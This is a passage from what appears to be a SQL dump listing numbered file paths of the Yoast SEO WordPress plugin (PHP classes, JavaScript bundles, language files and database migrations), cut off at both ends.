jax-integration.php'),(1948,'wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php'),(1949,'wp-content/plugins/wordpress-seo/inc/language-utils.php'),(1950,'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-ms.php'),(1951,'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-social.php'),(1952,'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-titles.php'),(1953,'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-wpseo.php'),(1954,'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option.php'),(1955,'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-options.php'),(1956,'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-taxonomy-meta.php'),(1957,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-author-sitemap-provider.php'),(1958,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-post-type-sitemap-provider.php'),(1959,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-cache-data.php'),(1960,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-image-parser.php'),(1961,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-admin.php'),(1962,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache-validator.php'),(1963,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php'),(1964,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-renderer.php'),(1965,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-router.php'),(1966,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps.php'),(1967,'wp-content/plugins/wordpress-seo/inc/sitemaps/class-taxonomy-sitemap-provider.php'),(1968,'wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php'),(1969,'wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php'),(1970,'wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php'),(1971,'wp-content/plugins/wordpress-seo/inc/wpseo-functions.php'),(1972,'wp-content/plugins/wordpress-seo/inc/wpseo-non-ajax-functions.php'),(1973,'wp-content/plugins/wordpress-seo/index.php'),(1974,'wp-content/plugins/wordpress-seo/js/dist/addon-installation.js'),(1975,'wp-content/plugins/wordpress-seo/js/dist/admin-global.js'),(1976,'wp-content/plugins/wordpress-seo/js/dist/admin-modules.js'),(1977,'wp-content/plugins/wordpress-seo/js/dist/analysis-worker.js'),(1978,'wp-content/plugins/wordpress-seo/js/dist/api-client.js'),(1979,'wp-content/plugins/wordpress-seo/js/dist/block-editor.js'),(1980,'wp-content/plugins/wordpress-seo/js/dist/bulk-editor.js'),(1981,'wp-content/plugins/wordpress-seo/js/dist/classic-editor.js'),(1982,'wp-content/plugins/wordpress-seo/js/dist/dashboard-widget.js'),(1983,'wp-content/plugins/wordpress-seo/js/dist/dynamic-blocks.js'),(1984,'wp-content/plugins/wordpress-seo/js/dist/edit-page.js'),(1985,'wp-content/plugins/wordpress-seo/js/dist/editor-modules.js'),(1986,'wp-content/plugins/wordpress-seo/js/dist/elementor.js'),(1987,'wp-content/plugins/wordpress-seo/js/dist/externals/analysis.js'),(1988,'wp-content/plugins/wordpress-seo/js/dist/externals/analysisReport.js'),(1989,'wp-content/plugins/wordpress-seo/js/dist/externals/components.js'),(1990,'wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew.js'),(1991,'wp-content/plugins/wordpress-seo/js/dist/externals/draftJs.js'),(1992,'wp-content/plugins/wordpress-seo/js/dist/externals/featureFlag.js'),(1993,'wp-content/plugins/wordpress-seo/js/dist/externals/helpers.js'),(1994,'wp-content/plugins/wordpress-seo/js/dist/externals/jed.js'),(1995,'wp-content/plugins/wordpress-seo/js/dist/externals/propTypes.js'),(1996,'wp-content/plugins/wordpress-seo/js/dist/externals/redux.js'),(1997,'wp-content/plugins/wordpress-seo/js/dist/externals/replacementVariableEditor.js'),(1998,'wp-content/plugins/wordpress-seo/js/dist/externals/schemaBlocks.js'),(1999,'wp-content/plugins/wordpress-seo/js/dist/externals/searchMetadataPreviews.js'),(2000,'wp-content/plugins/wordpress-seo/js/dist/externals/socialMetadataForms.js'),(2001,'wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide.js'),(2002,'wp-content/plugins/wordpress-seo/js/dist/externals/styledComponents.js'),(2003,'wp-content/plugins/wordpress-seo/js/dist/externals-components.js'),(2004,'wp-content/plugins/wordpress-seo/js/dist/externals-contexts.js'),(2005,'wp-content/plugins/wordpress-seo/js/dist/externals-redux.js'),(2006,'wp-content/plugins/wordpress-seo/js/dist/filter-explanation.js'),(2007,'wp-content/plugins/wordpress-seo/js/dist/help-scout-beacon.js'),(2008,'wp-content/plugins/wordpress-seo/js/dist/import.js'),(2009,'wp-content/plugins/wordpress-seo/js/dist/indexation.js'),(2010,'wp-content/plugins/wordpress-seo/js/dist/installation-success.js'),(2011,'wp-content/plugins/wordpress-seo/js/dist/languages/ar.js'),(2012,'wp-content/plugins/wordpress-seo/js/dist/languages/ca.js'),(2013,'wp-content/plugins/wordpress-seo/js/dist/languages/cs.js'),(2014,'wp-content/plugins/wordpress-seo/js/dist/languages/de.js'),(2015,'wp-content/plugins/wordpress-seo/js/dist/languages/default.js'),(2016,'wp-content/plugins/wordpress-seo/js/dist/languages/el.js'),(2017,'wp-content/plugins/wordpress-seo/js/dist/languages/en.js'),(2018,'wp-content/plugins/wordpress-seo/js/dist/languages/es.js'),(2019,'wp-content/plugins/wordpress-seo/js/dist/languages/fa.js'),(2020,'wp-content/plugins/wordpress-seo/js/dist/languages/fr.js'),(2021,'wp-content/plugins/wordpress-seo/js/dist/languages/he.js'),(2022,'wp-content/plugins/wordpress-seo/js/dist/languages/hu.js'),(2023,'wp-content/plugins/wordpress-seo/js/dist/languages/id.js'),(2024,'wp-content/plugins/wordpress-seo/js/dist/languages/it.js'),(2025,'wp-content/plugins/wordpress-seo/js/dist/languages/ja.js'),(2026,'wp-content/plugins/wordpress-seo/js/dist/languages/nb.js'),(2027,'wp-content/plugins/wordpress-seo/js/dist/languages/nl.js'),(2028,'wp-content/plugins/wordpress-seo/js/dist/languages/pl.js'),(2029,'wp-content/plugins/wordpress-seo/js/dist/languages/pt.js'),(2030,'wp-content/plugins/wordpress-seo/js/dist/languages/ru.js'),(2031,'wp-content/plugins/wordpress-seo/js/dist/languages/sk.js'),(2032,'wp-content/plugins/wordpress-seo/js/dist/languages/sv.js'),(2033,'wp-content/plugins/wordpress-seo/js/dist/languages/tr.js'),(2034,'wp-content/plugins/wordpress-seo/js/dist/network-admin.js'),(2035,'wp-content/plugins/wordpress-seo/js/dist/post-edit.js'),(2036,'wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler.js'),(2037,'wp-content/plugins/wordpress-seo/js/dist/react-select.js'),(2038,'wp-content/plugins/wordpress-seo/js/dist/reindex-links.js'),(2039,'wp-content/plugins/wordpress-seo/js/dist/schema-blocks.js'),(2040,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/af.js'),(2041,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ar.js'),(2042,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/az.js'),(2043,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bg.js'),(2044,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bn.js'),(2045,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bs.js'),(2046,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ca.js'),(2047,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/cs.js'),(2048,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/da.js'),(2049,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/de.js'),(2050,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/dsb.js'),(2051,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/el.js'),(2052,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/en.js'),(2053,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/eo.js'),(2054,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/es.js'),(2055,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/et.js'),(2056,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/eu.js'),(2057,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fa.js'),(2058,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fi.js'),(2059,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fr.js'),(2060,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/gl.js'),(2061,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/he.js'),(2062,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hi.js'),(2063,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hr.js'),(2064,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hsb.js'),(2065,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hu.js'),(2066,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hy.js'),(2067,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/id.js'),(2068,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/is.js'),(2069,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/it.js'),(2070,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ja.js'),(2071,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ka.js'),(2072,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/km.js'),(2073,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ko.js'),(2074,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/lt.js'),(2075,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/lv.js'),(2076,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/mk.js'),(2077,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ms.js'),(2078,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/nb.js'),(2079,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ne.js'),(2080,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/nl.js'),(2081,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pa.js'),(2082,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pl.js'),(2083,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ps.js'),(2084,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pt-BR.js'),(2085,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pt.js'),(2086,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ro.js'),(2087,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ru.js'),(2088,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sk.js'),(2089,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sl.js'),(2090,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sq.js'),(2091,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sr-Cyrl.js'),(2092,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sr.js'),(2093,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sv.js'),(2094,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/te.js'),(2095,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/th.js'),(2096,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/tk.js'),(2097,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/tr.js'),(2098,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/uk.js'),(2099,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/vi.js'),(2100,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/zh-CN.js'),(2101,'wp-content/plugins/wordpress-seo/js/dist/select2/i18n/zh-TW.js'),(2102,'wp-content/plugins/wordpress-seo/js/dist/select2/select2.full.min.js'),(2103,'wp-content/plugins/wordpress-seo/js/dist/settings.js'),(2104,'wp-content/plugins/wordpress-seo/js/dist/structured-data-blocks.js'),(2105,'wp-content/plugins/wordpress-seo/js/dist/term-edit.js'),(2106,'wp-content/plugins/wordpress-seo/js/dist/used-keywords-assessment.js'),(2107,'wp-content/plugins/wordpress-seo/js/dist/workouts.js'),(2108,'wp-content/plugins/wordpress-seo/lib/abstract-main.php'),(2109,'wp-content/plugins/wordpress-seo/lib/dependency-injection/container-registry.php'),(2110,'wp-content/plugins/wordpress-seo/lib/migrations/adapter.php'),(2111,'wp-content/plugins/wordpress-seo/lib/migrations/column.php'),(2112,'wp-content/plugins/wordpress-seo/lib/migrations/constants.php'),(2113,'wp-content/plugins/wordpress-seo/lib/migrations/migration.php'),(2114,'wp-content/plugins/wordpress-seo/lib/migrations/table.php'),(2115,'wp-content/plugins/wordpress-seo/lib/model.php'),(2116,'wp-content/plugins/wordpress-seo/lib/orm.php'),(2117,'wp-content/plugins/wordpress-seo/license.txt'),(2118,'wp-content/plugins/wordpress-seo/packages/js/images/Yoast_SEO_Icon.svg'),(2119,'wp-content/plugins/wordpress-seo/packages/js/images/Yoast_icon_kader.svg'),(2120,'wp-content/plugins/wordpress-seo/packages/js/images/connection-assistant.svg'),(2121,'wp-content/plugins/wordpress-seo/packages/js/images/icon-arrow-down.svg'),(2122,'wp-content/plugins/wordpress-seo/packages/js/images/icon-facebook.svg'),(2123,'wp-content/plugins/wordpress-seo/packages/js/images/icon-twitter.svg'),(2124,'wp-content/plugins/wordpress-seo/packages/js/images/local_assistant.svg'),(2125,'wp-content/plugins/wordpress-seo/packages/js/images/motivated_bubble_woman_1_optim.svg'),(2126,'wp-content/plugins/wordpress-seo/packages/js/images/succes_marieke_bubble_optm.svg'),(2127,'wp-content/plugins/wordpress-seo/packages/js/images/yoast_loading_spinner.svg'),(2128,'wp-content/plugins/wordpress-seo/readme.txt'),(2129,'wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-activate-action.php'),(2130,'wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-install-action.php'),(2131,'wp-content/plugins/wordpress-seo/src/actions/alert-dismissal-action.php'),(2132,'wp-content/plugins/wordpress-seo/src/actions/configuration/configuration-workout-action.php'),(2133,'wp-content/plugins/wordpress-seo/src/actions/importing/abstract-aioseo-importing-action.php'),(2134,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/abstract-aioseo-settings-importing-action.php'),(2135,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-cleanup-action.php'),(2136,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-custom-archive-settings-importing-action.php'),(2137,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-default-archive-settings-importing-action.php'),(2138,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-general-settings-importing-action.php'),(2139,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-posts-importing-action.php'),(2140,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-posttype-defaults-settings-importing-action.php'),(2141,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-taxonomy-settings-importing-action.php'),(2142,'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-validate-data-action.php'),(2143,'wp-content/plugins/wordpress-seo/src/actions/importing/deactivate-conflicting-plugins-action.php'),(2144,'wp-content/plugins/wordpress-seo/src/actions/importing/importing-action-interface.php'),(2145,'wp-content/plugins/wordpress-seo/src/actions/indexables/indexable-head-action.php'),(2146,'wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-indexing-action.php'),(2147,'wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-link-indexing-action.php'),(2148,'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-general-indexation-action.php'),(2149,'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-indexing-complete-action.php'),(2150,'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-indexation-action.php'),(2151,'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-type-archive-indexation-action.php'),(2152,'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-term-indexation-action.php'),(2153,'wp-content/plugins/wordpress-seo/src/actions/indexing/indexation-action-interface.php'),(2154,'wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-complete-action.php'),(2155,'wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-prepare-action.php'),(2156,'wp-content/plugins/wordpress-seo/src/actions/indexing/limited-indexing-action-interface.php'),(2157,'wp-content/plugins/wordpress-seo/src/actions/indexing/post-link-indexing-action.php'),(2158,'wp-content/plugins/wordpress-seo/src/actions/indexing/term-link-indexing-action.php'),(2159,'wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-login-action.php'),(2160,'wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-options-action.php'),(2161,'wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-phrases-action.php'),(2162,'wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-account-action.php'),(2163,'wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-keyphrases-action.php'),(2164,'wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-login-action.php'),(2165,'wp-content/plugins/wordpress-seo/src/builders/indexable-author-builder.php'),(2166,'wp-content/plugins/wordpress-seo/src/builders/indexable-builder.php'),(2167,'wp-content/plugins/wordpress-seo/src/builders/indexable-date-archive-builder.php'),(2168,'wp-content/plugins/wordpress-seo/src/builders/indexable-hierarchy-builder.php'),(2169,'wp-content/plugins/wordpress-seo/src/builders/indexable-home-page-builder.php'),(2170,'wp-content/plugins/wordpress-seo/src/builders/indexable-link-builder.php'),(2171,'wp-content/plugins/wordpress-seo/src/builders/indexable-post-builder.php'),(2172,'wp-content/plugins/wordpress-seo/src/builders/indexable-post-type-archive-builder.php'),(2173,'wp-content/plugins/wordpress-seo/src/builders/indexable-social-image-trait.php'),(2174,'wp-content/plugins/wordpress-seo/src/builders/indexable-system-page-builder.php'),(2175,'wp-content/plugins/wordpress-seo/src/builders/indexable-term-builder.php'),(2176,'wp-content/plugins/wordpress-seo/src/builders/primary-term-builder.php'),(2177,'wp-content/plugins/wordpress-seo/src/commands/command-interface.php'),(2178,'wp-content/plugins/wordpress-seo/src/commands/index-command.php'),(2179,'wp-content/plugins/wordpress-seo/src/conditionals/addon-installation-conditional.php'),(2180,'wp-content/plugins/wordpress-seo/src/conditionals/admin/doing-post-quick-edit-save-conditional.php'),(2181,'wp-content/plugins/wordpress-seo/src/conditionals/admin/estimated-reading-time-conditional.php'),(2182,'wp-content/plugins/wordpress-seo/src/conditionals/admin/licenses-page-conditional.php'),(2183,'wp-content/plugins/wordpress-seo/src/conditionals/admin/post-conditional.php'),(2184,'wp-content/plugins/wordpress-seo/src/conditionals/admin/posts-overview-or-ajax-conditional.php'),(2185,'wp-content/plugins/wordpress-seo/src/conditionals/admin-conditional.php'),(2186,'wp-content/plugins/wordpress-seo/src/conditionals/conditional-interface.php'),(2187,'wp-content/plugins/wordpress-seo/src/conditionals/development-conditional.php'),(2188,'wp-content/plugins/wordpress-seo/src/conditionals/feature-flag-conditional.php'),(2189,'wp-content/plugins/wordpress-seo/src/conditionals/front-end-conditional.php'),(2190,'wp-content/plugins/wordpress-seo/src/conditionals/get-request-conditional.php'),(2191,'wp-content/plugins/wordpress-seo/src/conditionals/headless-rest-endpoints-enabled-conditional.php'),(2192,'wp-content/plugins/wordpress-seo/src/conditionals/import-tool-selected-conditional.php'),(2193,'wp-content/plugins/wordpress-seo/src/conditionals/installation-success-conditional.php'),(2194,'wp-content/plugins/wordpress-seo/src/conditionals/jetpack-conditional.php'),(2195,'wp-content/plugins/wordpress-seo/src/conditionals/migrations-conditional.php'),(2196,'wp-content/plugins/wordpress-seo/src/conditionals/news-conditional.php'),(2197,'wp-content/plugins/wordpress-seo/src/conditionals/no-conditionals-trait.php'),(2198,'wp-content/plugins/wordpress-seo/src/conditionals/no-tool-selected-conditional.php'),(2199,'wp-content/plugins/wordpress-seo/src/conditionals/non-multisite-conditional.php'),(2200,'wp-content/plugins/wordpress-seo/src/conditionals/not-admin-ajax-conditional.php'),(2201,'wp-content/plugins/wordpress-seo/src/conditionals/open-graph-conditional.php'),(2202,'wp-content/plugins/wordpress-seo/src/conditionals/premium-inactive-conditional.php'),(2203,'wp-content/plugins/wordpress-seo/src/conditionals/primary-category-conditional.php'),(2204,'wp-content/plugins/wordpress-seo/src/conditionals/schema-blocks-conditional.php'),(2205,'wp-content/plugins/wordpress-seo/src/conditionals/semrush-enabled-conditional.php'),(2206,'wp-content/plugins/wordpress-seo/src/conditionals/should-index-links-conditional.php'),(2207,'wp-content/plugins/wordpress-seo/src/conditionals/the-events-calendar-conditional.php'),(2208,'wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-activated-conditional.php'),(2209,'wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-edit-conditional.php'),(2210,'wp-content/plugins/wordpress-seo/src/conditionals/third-party/w3-total-cache-conditional.php'),(2211,'wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-conditional.php'),(2212,'wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-wpseo-conditional.php'),(2213,'wp-content/plugins/wordpress-seo/src/conditionals/updated-importer-framework-conditional.php'),(2214,'wp-content/plugins/wordpress-seo/src/conditionals/user-can-manage-wpseo-options-conditional.php'),(2215,'wp-content/plugins/wordpress-seo/src/conditionals/web-stories-conditional.php'),(2216,'wp-content/plugins/wordpress-seo/src/conditionals/wincher-automatically-track-conditional.php'),(2217,'wp-content/plugins/wordpress-seo/src/conditionals/wincher-conditional.php'),(2218,'wp-content/plugins/wordpress-seo/src/conditionals/wincher-enabled-conditional.php'),(2219,'wp-content/plugins/wordpress-seo/src/conditionals/wincher-token-conditional.php'),(2220,'wp-content/plugins/wordpress-seo/src/conditionals/woocommerce-conditional.php'),(2221,'wp-content/plugins/wordpress-seo/src/conditionals/wp-robots-conditional.php'),(2222,'wp-content/plugins/wordpress-seo/src/conditionals/xmlrpc-conditional.php'),(2223,'wp-content/plugins/wordpress-seo/src/conditionals/yoast-admin-and-dashboard-conditional.php'),(2224,'wp-content/plugins/wordpress-seo/src/conditionals/yoast-tools-page-conditional.php'),(2225,'wp-content/plugins/wordpress-seo/src/config/badge-group-names.php'),(2226,'wp-content/plugins/wordpress-seo/src/config/conflicting-plugins.php'),(2227,'wp-content/plugins/wordpress-seo/src/config/indexing-reasons.php'),(2228,'wp-content/plugins/wordpress-seo/src/config/migration-status.php'),(2229,'wp-content/plugins/wordpress-seo/src/config/migrations/20171228151840_WpYoastIndexable.php'),(2230,'wp-content/plugins/wordpress-seo/src/config/migrations/20171228151841_WpYoastPrimaryTerm.php'),(2231,'wp-content/plugins/wordpress-seo/src/config/migrations/20190529075038_WpYoastDropIndexableMetaTableIfExists.php'),(2232,'wp-content/plugins/wordpress-seo/src/config/migrations/20191011111109_WpYoastIndexableHierarchy.php'),(2233,'wp-content/plugins/wordpress-seo/src/config/migrations/20200408101900_AddCollationToTables.php'),(2234,'wp-content/plugins/wordpress-seo/src/config/migrations/20200420073606_AddColumnsToIndexables.php'),(2235,'wp-content/plugins/wordpress-seo/src/config/migrations/20200428123747_BreadcrumbTitleAndHierarchyReset.php'),(2236,'wp-content/plugins/wordpress-seo/src/config/migrations/20200428194858_ExpandIndexableColumnLengths.php'),(2237,'wp-content/plugins/wordpress-seo/src/config/migrations/20200429105310_TruncateIndexableTables.php'),(2238,'wp-content/plugins/wordpress-seo/src/config/migrations/20200430075614_AddIndexableObjectIdAndTypeIndex.php'),(2239,'wp-content/plugins/wordpress-seo/src/config/migrations/20200430150130_ClearIndexableTables.php'),(2240,'wp-content/plugins/wordpress-seo/src/config/migrations/20200507054848_DeleteDuplicateIndexables.php'),(2241,'wp-content/plugins/wordpress-seo/src/config/migrations/20200513133401_ResetIndexableHierarchyTable.php'),(2242,'wp-content/plugins/wordpress-seo/src/config/migrations/20200609154515_AddHasAncestorsColumn.php'),(2243,'wp-content/plugins/wordpress-seo/src/config/migrations/20200616130143_ReplacePermalinkHashIndex.php'),(2244,'wp-content/plugins/wordpress-seo/src/config/migrations/20200617122511_CreateSEOLinksTable.php'),(2245,'wp-content/plugins/wordpress-seo/src/config/migrations/20200702141921_CreateIndexableSubpagesIndex.php'),(2246,'wp-content/plugins/wordpress-seo/src/config/migrations/20200728095334_AddIndexesForProminentWordsOnIndexables.php'),(2247,'wp-content/plugins/wordpress-seo/src/config/migrations/20201202144329_AddEstimatedReadingTime.php'),(2248,'wp-content/plugins/wordpress-seo/src/config/migrations/20201216124002_ExpandIndexableIDColumnLengths.php'),(2249,'wp-content/plugins/wordpress-seo/src/config/migrations/20201216141134_ExpandPrimaryTermIDColumnLengths.php'),(2250,'wp-content/plugins/wordpress-seo/src/config/migrations/20210817092415_AddVersionColumnToIndexables.php'),(2251,'wp-content/plugins/wordpress-seo/src/config/migrations/20211020091404_AddObjectTimestamps.php'),(2252,'wp-content/plugins/wordpress-seo/src/config/oauth-client.php'),(2253,'wp-content/plugins/wordpress-seo/src/config/researcher-languages.php'),(2254,'wp-content/plugins/wordpress-seo/src/config/schema-ids.php'),(2255,'wp-content/plugins/wordpress-seo/src/config/schema-types.php'),(2256,'wp-content/plugins/wordpress-seo/src/config/semrush-client.php'),(2257,'wp-content/plugins/wordpress-seo/src/config/wincher-client.php'),(2258,'wp-content/plugins/wordpress-seo/src/config/wincher-pkce-provider.php'),(2259,'wp-content/plugins/wordpress-seo/src/context/meta-tags-context.php'),(2260,'wp-content/plugins/wordpress-seo/src/deprecated/admin/add-keyword-modal.php'),(2261,'wp-content/plugins/wordpress-seo/src/deprecated/admin/ajax/class-recalculate-scores-ajax.php'),(2262,'wp-content/plugins/wordpress-seo/src/deprecated/admin/ajax/class-yoast-onpage-ajax.php'),(2263,'wp-content/plugins/wordpress-seo/src/deprecated/admin/class-recalculate-scores.php'),(2264,'wp-content/plugins/wordpress-seo/src/deprecated/admin/class-social-admin.php'),(2265,'wp-content/plugins/wordpress-seo/src/deprecated/admin/endpoints/class-endpoint-ryte.php'),(2266,'wp-content/plugins/wordpress-seo/src/deprecated/admin/extension-manager.php'),(2267,'wp-content/plugins/wordpress-seo/src/deprecated/admin/extension.php'),(2268,'wp-content/plugins/wordpress-seo/src/deprecated/admin/extensions.php'),(2269,'wp-content/plugins/wordpress-seo/src/deprecated/admin/keyword-synonyms-modal.php'),(2270,'wp-content/plugins/wordpress-seo/src/deprecated/admin/license-page-manager.php'),(2271,'wp-content/plugins/wordpress-seo/src/deprecated/admin/links/class-link-compatibility-notifier.php'),(2272,'wp-content/plugins/wordpress-seo/src/deprecated/admin/links/class-link-table-accessible-notifier.php'),(2273,'wp-content/plugins/wordpress-seo/src/deprecated/admin/multiple-keywords-modal.php'),(2274,'wp-content/plugins/wordpress-seo/src/deprecated/admin/notifiers/class-post-type-archive-notification-handler.php'),(2275,'wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage-option.php'),(2276,'wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage-request.php'),(2277,'wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage.php'),(2278,'wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-ryte-service.php'),(2279,'wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate-posts.php'),(2280,'wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate-terms.php'),(2281,'wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate.php'),(2282,'wp-content/plugins/wordpress-seo/src/deprecated/admin/ryte/class-ryte.php'),(2283,'wp-content/plugins/wordpress-seo/src/deprecated/admin/taxonomy/class-taxonomy-content-fields.php'),(2284,'wp-content/plugins/wordpress-seo/src/deprecated/admin/taxonomy/class-taxonomy-settings-fields.php'),(2285,'wp-content/plugins/wordpress-seo/src/deprecated/admin/taxonomy/class-taxonomy-social-fields.php'),(2286,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/abstract-class-deprecated-schema-piece.php'),(2287,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/breadcrumbs.php'),(2288,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-frontend-page-type.php'),(2289,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-handle-404.php'),(2290,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-opengraph-image.php'),(2291,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-opengraph-oembed.php'),(2292,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-primary-category.php'),(2293,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-twitter.php'),(2294,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-woocommerce-shop-page.php'),(2295,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/frontend.php'),(2296,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-article.php'),(2297,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-author.php'),(2298,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-breadcrumb.php'),(2299,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq-question-list.php'),(2300,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq-questions.php'),(2301,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq.php'),(2302,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-howto.php'),(2303,'wp-content/plugins/wordpress-seo/src/depreca